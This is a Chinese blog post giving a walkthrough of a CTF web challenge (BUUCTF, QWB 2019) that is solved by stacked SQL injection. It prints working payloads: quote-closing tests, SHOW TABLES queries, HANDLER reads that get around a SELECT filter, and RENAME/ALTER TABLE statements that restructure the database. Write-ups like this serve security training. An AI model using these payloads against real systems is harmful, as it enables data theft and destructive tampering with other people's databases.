CTF-Web-Sql注入-强网杯 2019]随便注

已于 2022-02-21 16:25:00 修改
阅读量1.4k 收藏 5
点赞数 3
分类专栏: CTF竞赛 文章标签: sql web安全 信息安全 网络安全 渗透测试
于 2022-02-21 16:05:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42566218/article/details/123048602
版权

CTF-Web-Sql注入-强网杯 2019]随便注

题目链接:BUUCTF
类型:sql注入
知识点:堆叠注入、mysql句柄操作(handler)

解题过程

方法1

测试注入点发现GET型字符注入,

  • ?inject=1' or '1'='1
    Hb3IgI.md.png

order by爆破字段2

  • ?inject=1' order by 3%23
    Hb8uKx.png

配合union select发现过滤规则

  • ?inject=1' union select 1,2%23
    HbGSFe.png

没有过滤分号,测试堆叠注入成功,查询当前数据库的表有1919810931114514words两张表

  • ?inject=1';show tables%23
    HbGBOx.png

接下来查询每张表中有哪些列明,继续使用堆叠注入配合show,发现191开头的表中存在flag关键字,这边需要注意一下的是因为这张表的名字为纯数字,在使用时需要通过"`"号括起来

  • ?inject=-1’;show columns from `1919810931114514` %23
    HbGX1s.png

因为目标过滤了select语句所以直接查询是不太可能了,这时就得用到其他可以读取表数据的方法,在网上找了找发现mysql数据库中可以使用handler语句读取表中的数据,阅读官方文档后发现这玩意就相当于一个数据指针,先创建要一个准备读取的对象然后操作这个数据指针去读取表中的数据,help查看用法如下

  • help handler;
    HbqKZd.png
  1. handler 要读取的表名 open as 别名;(打开一个句柄实例,也可以不取别名,用一个as是为了下面更加方便操作)
  2. handler 别名 read next;(将句柄移动到表中的第一行数据并且读取,也可以用first或者last读取第一行和最后一行)
  3. handler 别名 close;(将这个句柄实例关闭)

了解handler的用法再配合堆叠注入拿到flag

  • ?inject=1';handler1919810931114514open as toert;handler toert read next%23
    HbOtEj.png

对于这道题目网上搜了一下还有一种做法,就是将1919810931114514表改成words表,然后使用alter table将1919810931114514表中的falg列名修改为words中的id列名,然后通过原本的查询将flag查询出来,具体payload如下

  • ?id=1';rename table words to word;rename table1919810931114514to words;alter table words change flag id varchar(100);show tables;
    HbzU1I.png
  • ?id=1' or '1'='1
    HqSkvt.png

方法2

第二种通过修改表名字段的方式最好再用alter table add将1919810931114514表新增一个名为data列,这样就完美模拟了原来的words表结构,没有增加data列是因为目标原本的select语句应该是select * from words where id=’’,因为加了“*”所以什么都能查出来,如果语句为select id,data from words,那用原本的方法就没办法查出flag值了,因为找不到data列select语句会报错,payload如下

?inject=1';rename table words to word;rename table `1919810931114514` to words;alter table words change flag id varchar(100)%23

再通过内联查询得到flag

  • 1' or '1'='1
    针对这个情况可以做一个简单的实验

使用select查询固定列名信息

  • select id,name from student
    HbxLm8.png

当student表中没有name字段后再通过刚刚的语句就会报错

  • alter table drop name;
  • select id,name from student;
    HbzZtJ.png
Toert_T
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2485
以buuctf强网杯2019为例的堆叠
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(2),2024年最新阿里P7大牛整理
2401_84302761的博客
05-12 877
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
强网杯 2019]随便SQL注入】四种解法
weixin_38832257的博客
08-17 1378
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql注入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
BUU sql注入-[强网杯 2019]随便
Ivyyyyyy1的博客
10-15 1718
一、题目 一进来先看看能否用构造单引号闭合: 发现提示报错,可以操作了 二、解题 方法一:handler命令打开 先查列数,这里是输入2没报错,但输入3报错了,所以是2列 试试联合查询: 回显信息是 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); $inject是我们在输入框中提交的变量名,preg_match()在这里的作用是检测关键字,猜测会被...
buuctf web题解之[强网杯 2019]随便1详解
2301_77451464的博客
01-29 1035
目录一、用到的知识点二、堆叠入的原理1.先看是字符型还是数字型2.查看入点3.接下来就是查看闭合方式4.再测试字段数,二分法,一点一点试,最后测试出来为25、联合查询,发现select|update|delete|drop|insert|where包括大小写等操作被过滤6.先通过show databases爆出数据库7.然后用 show tables 爆表8.可以看到这里有两个表,我们先尝试爆words表的内容9.爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来)1
[CTF-writeup] BUUCTF强网杯2019_随便
.
11-26 936
相对于比较简单的SQL注入而言,这道题在步骤上确实显得有些曲折了,因为过滤机制给我们带来了一些麻烦。但总体而言,找入点、判断闭合方式、爆破表、爆破字段的思路还是比较清晰的。笔者在这道题中的做法——对已知表的结构进行修改,也可以提供一种灵活的思路。
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3988
这是一个典型的sql注入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
web | CTF】BUUCTF [强网杯 2019]随便
weixin_46301214的博客
03-09 483
2. 利用现成的select语句进行查询,先改当前表名为flag的表名,然后再改字段,再展示。然后试试叠堆入,其实叠堆入的这种题目出现很少,毕竟实际上只能运行一条sql语句的。发现这个表只有一个字段,就写着flag,那我们读取这个数据库的这个表的这列就可以了。先探测一下是不是单引号闭合,其实我一开始以为是没有引号闭合的,毕竟是数字。` ` 反引号据说是无敌的,具体原理我研究了一下也不敢确定,就不写了。测试了一下,发现的确是叠堆入,所有的数据库都爆出来了。这里有神奇的一幕,就是要用反引号以及-- q。
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本题目中,我们面对的是一个典型的Web安全问题——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
会Excel就会sql
svygh123的专栏
07-20 1238
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 499
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
CTF Web SQL注入 10000字详解
最新发布
qq_27489877的博客
07-25 1259
SQL注入就是在数据交互中,前端数据传到后台时没有做严格的判断,导致传进来的数据被拼接到sql语句中,被当作sql语句的一部分进行执行,从而导致数据泄露,丢失甚至服务器瘫痪。对其中的特殊字符进行了转义,但在存入数据库时还是原来的数据,数据中一般带有单引号和#号,然后下次使用在拼凑SQL中,所以就形成了二次入。当原语句的闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,导致报错,通过报错信息我们就可以推断出闭合符。攻击者必须闭合开放的字符串(使用引号),然后入额外的 SQL 代码。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值